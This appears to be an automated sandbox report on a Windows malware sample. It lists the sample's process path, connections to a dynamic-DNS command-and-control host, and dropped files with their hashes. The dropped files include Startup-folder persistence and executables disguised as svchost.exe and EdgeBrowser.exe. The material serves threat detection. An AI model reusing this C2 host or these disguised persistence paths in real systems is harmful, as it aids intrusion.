"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dontreachme3.ddns.net udp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp
US 216.218.135.118:3604 dontreachme3.ddns.net tcp

Files

memory/2056-0-0x00000000003D0000-0x00000000006B0000-memory.dmp

memory/2056-1-0x0000000074760000-0x0000000074E4E000-memory.dmp

memory/2056-2-0x00000000007E0000-0x0000000000860000-memory.dmp

memory/2056-3-0x0000000006060000-0x00000000060A0000-memory.dmp

\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe

MD5 17fc12902f4769af3a9271eb4e2dacce
SHA1 9a4a1581cc3971579574f837e110f3bd6d529dab
SHA256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512 036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 fe2e3b24616f78c00cb2b7d7eb6d3f49
SHA1 1c57ac7f6420384b4c90777632d1bfe4074cab90
SHA256 b1d442895c264211d3e6a207af29d9ad75f13799bba012f497a0bd272a66b0cc
SHA512 b17c0a61216e4a99ef7b23b672e7898263dea6861e46c8a4c4e91a3a1a90b50692312828dd16aaaf036b1f586559b7e1db77f9bf3128b926b0f6f128ef9a68bd

memory/2524-26-0x0000000000BF0000-0x0000000000ED0000-memory.dmp

memory/2524-27-0x0000000074760000-0x0000000074E4E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 b700fa1b5dd1c064d14e55fa1d1c7659
SHA1 138738eee4a62f28502199d6c6a857cd39db3eb9
SHA256 b45714062c0319721ca3fc811daf6478e9b6740e675239844a6ceb0157980be7
SHA512 cd720c624b638fc283fe1c5d299301219646359f6ea02a389365bc9c6cd2a6f7c980489fd658ee9edd738b9dfee43c36a738a6ce70a9e7fdede6ca10bd68ba86

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

MD5 6cdc039a4640026dc5acdd8b05a187a3
SHA1 096d66bd53e3ac254b21d1aa4319df8da336b891
SHA256 d159f7eefbd511862789e18ac45779bdd819a76d2024e76263393af4cdf47daf
SHA512 6bbcfb2c6d7cdd8e16b267b00fdce98f5152966b1014d58067ffafb09d6d009d8b0941eda43060f3a3034b27681e7b18fe38a5daf5e9f2f8c20d7fbb81a0f196

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 9ce1096fcb9507e10edff99216c207ee
SHA1 7ba37c1f3e7445f0d14cbbed41b950ed96e69d3f
SHA256 03879fd435911c072034cf32ea0fb2131c6a5f57ac266d73933e065745d669fa
SHA512 1ad37dd03cad8e83546a38dfa345ed43041279b745af0dc822eaba193c5d920da23e76c0d81ba7fee1ee4cb66cb6d2561317593dc8c548ba0bf1bae9d68558e8

memory/3008-60-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2592-61-0x000000006F700000-0x000000006FCAB000-memory.dmp

C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe

MD5 ec7d0b435f9af2a7e5bd4ef3cf0625b1
SHA1 2953bb8e6c9845c446476ed92a6effba2b2bd2ec
SHA256 c332600c1c451ce7ca7a44ff79add4efc159b3dfdcd4dad81baa499e30913b40
SHA512 8f596695e54914f9cd298f49b6c6a49bd3e724c72db9ee602eae494446fc2f624c6964c4b85cab66025e6738d3e7c63b00743a1f0aefc54ee3b31378c1b3875d

memory/2728-73-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2580-74-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2568-78-0x0000000002700000-0x0000000002740000-memory.dmp

memory/2592-84-0x0000000002090000-0x00000000020D0000-memory.dmp

memory/2728-85-0x0000000001D90000-0x0000000001DD0000-memory.dmp

memory/3008-89-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2592-90-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2728-91-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/3008-83-0x0000000002660000-0x00000000026A0000-memory.dmp

memory/2580-92-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2568-75-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2568-93-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/976-94-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2580-96-0x00000000027A0000-0x00000000027E0000-memory.dmp

memory/976-97-0x0000000002600000-0x0000000002640000-memory.dmp

memory/2592-98-0x0000000002090000-0x00000000020D0000-memory.dmp

memory/976-95-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2568-100-0x0000000002700000-0x0000000002740000-memory.dmp

memory/2728-99-0x0000000001D90000-0x0000000001DD0000-memory.dmp

memory/1116-102-0x0000000002860000-0x00000000028A0000-memory.dmp

memory/1116-101-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/976-106-0x0000000002600000-0x0000000002640000-memory.dmp

memory/2728-110-0x0000000001D90000-0x0000000001DD0000-memory.dmp

memory/1976-111-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2592-109-0x0000000002090000-0x00000000020D0000-memory.dmp

memory/1116-108-0x0000000002860000-0x00000000028A0000-memory.dmp

memory/3008-107-0x0000000002660000-0x00000000026A0000-memory.dmp

memory/2580-105-0x00000000027A0000-0x00000000027E0000-memory.dmp

memory/1116-104-0x0000000002860000-0x00000000028A0000-memory.dmp

memory/1116-103-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/1976-112-0x00000000025B0000-0x00000000025F0000-memory.dmp

memory/1976-113-0x00000000025B0000-0x00000000025F0000-memory.dmp

memory/2580-114-0x00000000027A0000-0x00000000027E0000-memory.dmp

memory/1976-115-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/1976-117-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/3008-116-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/1116-119-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2580-122-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2728-121-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/976-123-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2568-120-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/2592-118-0x000000006F700000-0x000000006FCAB000-memory.dmp

memory/1604-141-0x000000006ED50000-0x000000006F2FB000-memory.dmp

memory/1604-144-0x000000006ED50000-0x000000006F2FB000-memory.dmp

memory/1604-151-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1780-157-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/1780-158-0x000000006ED50000-0x000000006F2FB000-memory.dmp

memory/1780-156-0x000000006ED50000-0x000000006F2FB000-memory.dmp

memory/2052-164-0x0000000002480000-0x00000000024C0000-memory.dmp

memory/2052-163-0x000000006ED50000-0x000000006F2FB000-memory.dmp

memory/2140-161-0x000000006ED50000-0x000000006F2FB000-memory.dmp

memory/2140-162-0x00000000028B0000-0x00000000028F0000-memory.dmp

memory/400-173-0x0000000000400000-0x000000000041A000-memory.dmp

memory/400-182-0x0000000000400000-0x000000000041A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 60e23a2a7a0704efc0a661ff928fa02b
SHA1 555f88d1c5782f7ac9c77a7a2c154a087dc52018
SHA256 d412c8cd8aa864377990a39ead9a70f36e9feea96f93db338a7b918f2c8820f7
SHA512 60e82817d5fff89c0a91403e47682909a75f51e17ab0a697e7dd8b4bc87991d05aeb7741a0863f56f7f8746936e133806f553b2a5ce6a1100c2028e053f09fc0

C:\Windows\EdgeBrowser.exe

MD5 796ed4b0db9b3d50149b39c35c97fb22
SHA1 154fde51c43d3a8b8f1b96df04f3e97fe4c922a6
SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
SHA512 762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7

memory/16336-257-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/400-184-0x0000000000400000-0x000000000041A000-memory.dmp

memory/400-179-0x0000000000400000-0x000000000041A000-memory.dmp

memory/400-177-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/400-175-0x0000000000400000-0x000000000041A000-memory.dmp

memory/400-176-0x0000000000400000-0x000000000041A000-memory.dmp

memory/400-174-0x0000000000400000-0x000000000041A000-memory.dmp

memory/1780-160-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/1780-159-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/1604-150-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1604-143-0x0000000002910000-0x0000000002950000-memory.dmp

C:\Windows\EdgeBrowser.exe

MD5 f37b599f4ae7813f692e84cd3b1aab00
SHA1 483fd68331c8f8c041009910b84684d7a3ade7d0
SHA256 26ed609c405174081e7c23ed3b91bd3585a21975a8ec231d16d5635f0ae7039e
SHA512 006e98deba2a746203e6f14aed30a1fbfab5689a727904a08b19dbc3c9e14882e9d7bde0342bd3b8279f77fe87cc2f2fd926e796d2125322916236eb42ba8171